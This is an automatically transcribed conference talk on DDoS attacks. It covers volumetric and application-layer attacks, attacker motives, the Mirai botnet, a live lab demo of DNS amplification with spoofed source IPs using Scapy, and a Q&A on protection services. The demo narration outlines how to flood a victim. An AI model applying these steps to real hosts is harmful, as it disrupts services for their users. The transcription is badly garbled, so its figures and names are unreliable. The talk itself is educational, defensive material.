Brace YoSelf: DDoS is Coming

okay so what's all that I want to introduce myself stop it we're developer later most academic researcher ben-gurion university and [ __ ] learning and cyber security area now I'm working or form a couple company when you reveal a diversification replication construction and different automatic tax litigation those my social video so one point my happen with monster is that what I say is this where the patient is my opinion and not mine and clip so what it is I'm sure also be repairable videos but I want to do somewhere quick hate introduction thank you so what exactly is a little is it when I of service attack at the entity stop or deny access to any resource or service so unlike

other type of the times that try to insert a other part that that try to steal some information those tags try to drop your service and the night for hottest for legitimate users so let's look for difference between does and yes I understand mostly attacker try to use some exploit or mobility in software design service of your service or your system indeed us attacks exod distributed so this is what's coming amount of traveling and mostly it flew for your system or mini request high bandwidth or changing so to try to exhaust any resource you use for your sister so if we look and give us attacks we never actually two main type of videos hard first one is volumetric

attacked voltammetric sharks try to exhaust research for infrastructure for example memories you have a then give babies try to send more than give your widget users will have some levin see and another touch of the type of magic attack is texas-based tax so the type of tribes resource of your any machines like firewalls or out so this how they take a look and our systems example only one side you can see a family's attached with 300 gigabit per second even huge company can be heated by such a drag it's very messy actually the biggest one is obscene is 470 [ __ ] be so it is just amazing how big he is and on other side

you can see there is a packet per second of that so reach 200 and few can remember matte medium packet per second book so we may and your router or firewall to crash and try to produce so bleep it six all the resources and the other type of the DDoS attacks is well seven times for application text this type of Varitek try to exhaust resource of your server for example if you have web server that can handle with 1000 current customers so if way 101 try to access your server you'll have some latency or maybe it's a little crash mostly of trucks try to do to a 2 x database attacks try to crush your database many requests

queries from the social or relational text so if you have blogging on your page its CPU bomb post procedure so if they apply to try to brute force you with some where username and password it will it's all cpu of your a so so let's stir the example from all season how application layer that look like you can see a blue line is just a human's so it's the difference between a human named amount of traffic and boss there is only health of helium quadrangular of a request and it's enough to crash in very very strong bigger 87 so what what we do good and distinguish between both of human smell different classification fingers between from time so when you

can stop the attack on balls and let human to access the set the interesting statistic have very important record that almost in water of attacks are faltering multi-vector means if I could try to hit your summer do not only using application layer dark alright then with the attack through different levels try to find which spot here infrastructure of your system on the other hand you can see there are 75 percent or practical only one letter means any script video any person just came by the Hills Ohio and tried to attack any 7 another interesting statistic that they're almost the 50 / of Sam was even more than once this report from our customers behind protection service so the attackers know

that they are protected and they still continue to try to attempt to find good spots and eat the service so issue was it at once probably will more and more and more till they succeed will crush yourself so why to do videos attack I can descend why to do a skilled objection you can steal some credit card information why to the remote code execution you want to take control of the server slotek success so any ideas why do you do something oh she's ripped services it is Harper is down all right get conference down gen consoles robot ok so i summarize the reasons let's stay talk about so first one is business to valor if you have a conference the

concept of a shop ecommerce shop that sells some tools and you want take down your way peters so you can purchase use for half is very cheap from 20 to 50 years dollars for one hour and just get down your computer so all the customers will come to you or steal your other website but not another resonance nation disick social it's very powerful some nails sent to different a web server wanna see the day if the dotted if you will not pay a couple of bitcoins in average 15 bitcoins as it can be more in 100 bitcoin so we'll need us your a server and they do small attacks for 10-15 minutes just to show the power and

they can do this give us attack in many cases they count on maybe groups like anonymous say that they have to say this power but the mail is come from animal and is resource off we don't know if they exactly connected or not releasing a group so it's very very very very calm to heat exhaustion be the Sun another a recent activism so if someone don't like other group of riddick like elections the u.s. complied [ __ ] of rhythm you will pick their website and there is a two main groups in the hacktivists anonymous very famous and lizard squad is our squad more oriented in gaming industry so get a quick on those games and groups games

one more a reason is a state-sponsored or a side of courage chili it's a very good number cobbler for me 2007's tanya was disconnected from the internet because Russia dearest their infrastructure and four countries it's more easy because they can cover themselves look like if you drove some rockets or missiles and other country so you're opening the world if you do videos no one knows exactly where it's come from but you can get other country's infrastructure and you were very low budget hey some thousand dollars look unlike the flight one more the reason is revenge okay so if you don't like some person don't like some company you can purchase dealers either web service it's very common between the

game groups or we have seen in American football so it's a one-man team lose to another series of style heat winners left side and vice versa just pour it for revenge slamming more easy small screen so we happen to install a couple hospital when the leaders attack came to some1 the infrastructure company so all the IT people they run to the money goes to understand what happened and try to figure out this issue but actually it was just a small screen to reach it back to steal some confidential information so it is that can also be smoke screen to more sophisticated and less than but not least flow means if you use do it for fun just to get some respect for

their friends 30.7 so if we are talking about videos we can't mention a new ideas I'm very old and use 18 use for last month we got here welcome you a boat and attacking times so let's do a brief you what happened in use it started on the extra burden on sea level 21 when a cybersecurity journalist krebs leu is closed ay Dios group videos actually guides us for my country from Israel and well the blog about that so the attack is a weblog with huge amount of traffic she was the biggest attack ever seen in middle see ya later in September shortly a new apartment that was the source code was leaked to the

web and source code of death both the attack Krebs on security it was later and 21 sober dine domain hosting server one of the biggest event hosting several see us or seated by tag and they told that the attack came from you a cotton mill gotten posts involved the later Twitter skirts outage because some information leak in WikiLeaks and variable disconnected for my the internet and clothes abuse attack so this is news from the last month so what is the new idea what else aside and said softly concept under 30 by a user name on except I some is so in some form geo is just a charter from my age of easy so what interesting about Mirabal is he it

is very simple technique to infect machines you don't you send email with son lucious Lyon halted the weekly will open it you some social engineering you just scan all the internet all there is and look for talent and assay with default credentials actually it has the dictionary 62 username password doubles and try to access is this devices and most of where the devices they are a IP cameras manufactured in China did place very simple busybox humor they don't say close any default username password so you can just tell them equal the credentials your local da and you have a routine visit you so from our research we found that there there is more than one hundred thousands of infected

machines around the world mostly in both in East Asia also in South America Europe and even very uncommon places like islands in a city ocean exotic places hence easy to understand White's happen because you can buy this camera in Aliexpress you don't care a boozer manufacturers cheap eats do the work it's ma your room when it reaches the camera and you can connect with zo mobile phone to see the image but you don't know it is protected and on earth to infect the camera is for sugary a a plant different type of tax problem we'll look inside how it does it works for example it's do a sec and TCP are taxed stomp attack UDP attacks also

dms as well as HTTP what is not interesting is lou gehrig's jury is protocol for handling so you tongue you encapsulate your package send it to the router and router need to translate it have to know whom to follow this packet so if you do give us attack from the GRE tunnels you exalt the resources of your router because before he they're also drop any packet if he finds its legitimate cagiva need absolutely so you two instances you're out actually anyone interesting in here and also anti anti deals to kick if they knew about during the attack discovered that their attack we can use a cloud for protection for a given source protection do some

manipulations on packets to bypass identification system these two antojitos protection from copper and those doors actually this is part of a part of the code for me as well a new estoy perdido it means message which camera it looked for other votes on same camera for example computer balls cue ball or a map and try to kill them to have all the power from this and machine this camera fold itself also it calls a TV is all the station teleports as well as it should be now get other competitors reach this camera and it equinox lead us for how a little smaller this part of the code from cnc so you can see those a SQL query that say a

last page and attack so youyou poshest so you can purchase attacks from way from both oh no just based on bitcoins and you have a multiple tag and amount of variables and how it connected to die and then confirm that me revolt was premiered source of the attack it wasn't $21 and mostly use TCP and UDP flood shark on port 53 said I'm is the main holster for DNS so mostly used by useful cord injury and they send it packet packet rate rose 40 to 50 times sine the cradle a normal traffic so even such big company like dying twitter and github post their domains using time can be heated by needles and they can handle it crashing

so let's understand how how we can do a leader stack first of all let's talk about application past let's do some way i briefed a pick up about the application layer we have HD so for example this is a post request you have a URL path also wanted to reach different method updating HTTP headers about a client user agent accept language etc and post data so what we do we just send this information to our web host the rebels resolve it and send us off so what type of loop the sand is common to the botnet for example me right please reach victim server so if so i can handle some capacity of fair quest on current you have button if it

contains 100 thousands of balls probably even meet server can help another thing that the Tucker's Dupree oh they try to affect the seven dots for weak spots in your web page for example this page contains a large image so if you if it's not cache and try to get more and more from this in HD if you're up play up stick traffic so as I mentioned before you have searched you need some SQL queries so you can make off searches to be database resource and museum impossible game CPU resources so all these can be used by their check out to get yourself another type of attack is volumetric attention so let you quick recap of all the layers will not talk

about their 141 to talk about the 34 network layer skyteam protocol and transport layer so it's mostly tcp and UDP so how a packers do work on his list first of all sinful all the time for example attacker won't do sinful attack is sent back it hi I'm one on one point one but this book is The Associated because this is the first packet that send in three great handshake use participe sodium stood let be the packet sent to the victim division I need to store all the connections keep the state of them in the table so you open the connection and send the response to a real one point one point one bit have no

idea what would ease of you on put later that occurs and flood of this same connections solve the table open connection in the victim several girl and growing volatile their run you're exhausted and probably machine will try another type of attack is actual very simple you just switch between sing f signal flag tcp blackwell and you send a lot of attacks this the way all a that all requests based tax time they send a lot of a key to a practice because small type of level we can sever me to understand if it's legit or not would you take it before you drop it so if he'd say the resources of the issue also our club can be done this

reflection so inflection what we do we take a syn packet send it through someone else then we send it the hook up our source is spoofer for example i'm the weekly and i am going to to to co-host so all the host response we seem act to the week and the week we can distinguish between the jeep and not legit users because they came from distributed network from distributed sources one more attack is DM certifications very very common its heat also pantries and also a market hypothesis so what on this tag titles and dns work with some requests about the domain to dns server and he s ever respond with a result to the beginning

so what happened here just amplified because the request is very small you're just ask you need information about some domain but response can can be ten times bigger because contains the information develop and the server's mail servers and IP a in 48 so if you send small package the response will be much much bigger and Bentley's as well as a packaging so I want to show some way then small demo about the DNS amplification how easily can be done using cubicles and all we need to do is a workshop it's Swiss 94 for the whole network hair and security researchers if you capture the packets and see what's going on inside and another two is kept using Python so it's

multi-platform and sketchy you can make your own packet it put the to kill the fields inside the whatever you want I just send over a order so I'll switch today chili we need three machines okay one shady say check out so use the cali another machine will be the winning numbers and some she is a our dns server so

look

so this is the hour a dns a chainsaw we have here simple and fine silver so that was information about the foot back okay you can see all these there is formation left a vm server storm about some domain so we use it for our publication now that machine is windows and just check that e then 40 2.4 okay and we have your wireshark so of capture okay and fulfill the traffic that came from a our a coupon so it's 10.0 point two point five okay silver truck there's no charge and this is the attacker cut it so it's IP is 10.0 Point to Point C so let's talk Chevy first of all we need to

create a different type of packets AIP

the EMS business boy so if you don't remember what the what he feels you can feel in a side packet you get right for example I p display so as you can see those version 4 and a source and destination IP is by default they are all right so first of all want access our are a DNS cell is so the try type ii c standard 2.5 and let's fill out the NS quarry

okay so we need to write a yes

and we want to ask for not only for a record but also for all records so right D&S you tied 55 so we'll get all the records and we want to do a recursive so

one and those on 14 saltiness

so now we have a DNS oil and put it inside out a DNS Tekkit

okay and try to send it to our to the dns server to see what each responsibility right 90 which happening their demos oh my god but when you come will remember it stopped working okay so we have a response from you from dns server all information so let's let's see what the difference inside is so if I check the size of play our request

it's 58 56 very small but the size of where the response it's 639 so it's more than 10 times bigger so if you if we switched from a source IP with school they peel far waiting always 339 binds the goal directed or weekly when attack of Justice n55 so let's do it let's say they pee pee sauce did I p of the windows machine or

okay and let's try to Sam okay the packets and so let's check the windows machine okay as you can see windows machine received all the response from our DNS so because on top of UDP and no one cares about a three-way handshake you can spoof your IP is the victim and the responsibility of attention so let's do it acid promises sand okay this way we can send many many requests it is an also reach the machine so I after is small Leslie do it exactly the same I've showed you but then we have y lo why look so do we will send 1,000 requests to the machine so let's see what happened to our windows machine try to

stop receive blood a lot of traffic okay and discuss my people so they are negotiations very very easy

so I want to say obrigada Gordon and if you have any questions responsibility though it's always really fun time provider but you've read your eyes B cells will see the few 32 mantle shoppings just normal posture guys is no control to imagine it provide an excellent how much done deal with it wrong i said if i get within here with the region prohibition it depends on your contract what most of the ice caves that said if you have one gigabit deal that's when gob they will not filter your traffic and all the amount the pop the 10 video just gigabytes per second yes then there was another smoke eh syncope about one terabyte per second so

moving this and weaknesses of the protocols but the NS induce be that you referred well what is your opinion about tnx digit erosion protection in the future how to say my opinion because I happen is company that good he does perfections of this kind of advertising I mean if you want to do this protection first of all you need to remember and understand what is what's your weak spots okay so if you need to protect your infrastructure you need to care about protection maybe some v GP and on demand protection if you have web server you need to think about application layer of that ok and right I'm sure you can try speed you need to validate what are your

contract to include yes the question was marked in the same steps even the DDoS protection company necklace protecting Brian Krebs and website told him you can't protect you anymore so we'll we'll compromise other other customers so you are out you have to say another butt in case with Krebs yeah he was a free customer hakama so cost a lot of money to handle this attack that's why they talkin off but if you purchase leaders protection for example unlimited leaders protection so you get unlimited installation and you say virtual systems on-premise or cloud they can handle such amount traffic for example up we can handle more than 200 feets play off freeway traffic any moment to take that

sample is your question that's a check that we can hand write most of the most of the companies can handle it that's why they need to purchase the hitters perfection so question let's suppose that curves will actually purchasing the service but there's still the problem that the via the US back is compromising the other clients and from purely economic perspectives they're actually losing money or their actual problem lies in the business I keep in that client that's not putting them in proportion to the amount their music Horace's to up to Pat points I they expect you to keep that service running and not just stop the quiet even though he's a [ __ ] planet personal so first

of all this is a business model akamai business model ok so I don't agree with this business model we have as what happened with the crepes okay that when one client get aside Peters other clients also suffer from this crime it's let's say it stopped it's akamai's problem okay in our case what we're doing we're encapsulants we know when our clients suffer from my leaders attack other clients are completely disconnected they have different IP ranges so they're not suffer from this time okay adopt shalt same same network when one client attack medidas infants under the same good intention yes nothing but we do the end cast because get back to all our pops around the world okay so become more

distributed and we can handle it and our customers they have their own ID okay so other wipies can be separated two different the Pops to not suffer from this guy so the problem is I can I cool Hamlet up to the point where liquid the thing is there is always a baby partner there's always more clients there's always more bandwidth thank you so let's assume you actually reach the limit in which cannot physically handle idiot that if if the attack will reach already is now our company also crash one all the time try to be one step forward there then the biggest attacks okay so if the biggest attacks was one turbid on once i ice be an ansible french

franchise fee so we have two targets you will see that that we need more bandwidth with the mobile is you find more equipment we have very actually around hardware and software so we all the time look forward to handle even more most aggressive attack so it's basically nombre an average so with the proliferation of these recent the master fiber networks and domestic actions that are at minimum over on how to make beats per second and even gigabit the connections at one you can assume that the amount of bandwidth that distributive clients will have will eventually surpass the ones available Wilson so let's assume that they have huge amount of traffic but they need to do some pipes to send this traffic Avery

we use the same eyes to receive this job so the bank is not a problem okay so if there is let's let's say isolate it for example for some way is people I don't advise people i don't have amount of traffic and sam is some bad news we also connect our system to this IC or stretch service to the top to what point will it will an ASB for instance black black hole out another isp prices let's say that and some nationalized geez russian ice cream or something is the main source software distributed the US attack and we're talking about a huge amount of bandwidth its considerable you have to have a lot in server management

/ have to stop at etc will there ever be a limit at which you actually black hole the desire is key we don't like home and it's not important I don't know it's a friends like this way the icy shell and exchange the traffic but you think about it if if Tucker na resources to send this traffic okay yeah even if it's amplification okay so dns server office apply this request and we now then is to reply okay so on the other side we can get all this stuff you because you can we can have same amount of letters okay I'm actually one of your customers found so far happier happy my question is more about what can we do when we are

not targeted but the underlying issue structure is which was the case with integrity and all the side effects will affect this do you have any advice to lose our skills test understand you are our web application protection customer owner of such original web application and infrastructure only subs so can we imagine that like this da pms initial attack yeah so you do not defend us against that we it's just a side effect of drive so what what could you give us as the ultimate tips or suggestions when we are not directly targeted which we pay for those direct attacks but we don't pay to be protected for those um let's say side effects of big attacks on

the only attraction okay so i'll give you them so that i know a better class car a wallet minerals give you more more speed best answer okay come on from my point of view if you have dns 70 so we in Queanbeyan escalation if you attacked by dns amplification so there is no problem because we feel or any topic for example if you have a idea that should receive only traffic there is no problem PJ masks affection can filter UDP chocolate company my point is I'm not being targeted search not actually my domain or whatever but I mean affected by an attack that is affecting either the big pipe serving my country or something so it's not actually your job

to protect us against that it's a side effect like a line but still as security partners you always look so what should we do or what can we do to Lucifer mantilla that we could that the US and Europe Germany was worth targeted at all at least affected eventually can think of these kids where you have had a tall bike to not rely on the external dns and construction and have your own for instance these are the preschool degradation action would say what happens when you defy that my customers in Africa need to use to reach my servers in Europe is affected so that i can think of like rotting somehow the traffic through other point of the

countries but we don't have tools to effectively to it for instance we don't know I understand your question but I think I don't have a good answer for you receive you this question need to be directed to our product manager they can explain exactly how could I love the traffic and what the way especially for some kind of side effect how to handle it suggests now I would say is sharing information you guys must be able to know around the world that you said yeah it's also along the world socks you might know what is effective and helping the the local tip records I mean nutrition you to react can also be done by sharing information about what's

going well what's going not well around the world so we can try to quite section let me do it we have 24 7 is on server side if you suffer from some issues again yea i meant more visually so i'm not complaining about to serve you that's not very thick I mean about in general the industry could have such options to giving information also help people to contact them to react yes we do as much as we can have more posts so we share all information let's can't shell so for example about viewable at nine you can check if you can check other blog post about the needles and attacks that link the way we can show

the information we have with you

I was under a ddos attack you listening and one of the best example of EF was wearing two stops and all I I could tell absorb was hidden red and they succeed or when they do that sauce and for me they would give up when good love pot and more let me see I could not find anywhere but if maybe you have some either side to keep it share he's what's going on ready for this kind of attack I go somewhere where i can buy us what you got they're great people who so I want to answer first question when it stops we have seen a buck one for one month don't stop time so he's very very long

and about the cause it's all then sometimes some many cases in the open digital purchase a dose for high attack and do not understand if you are protected or not protection what size of your system you just know that you want to hit him and he don't care about the results of looking until the check so probably twice two times five times and only then can descend at your protection and there's no point try to do thank you so if you have more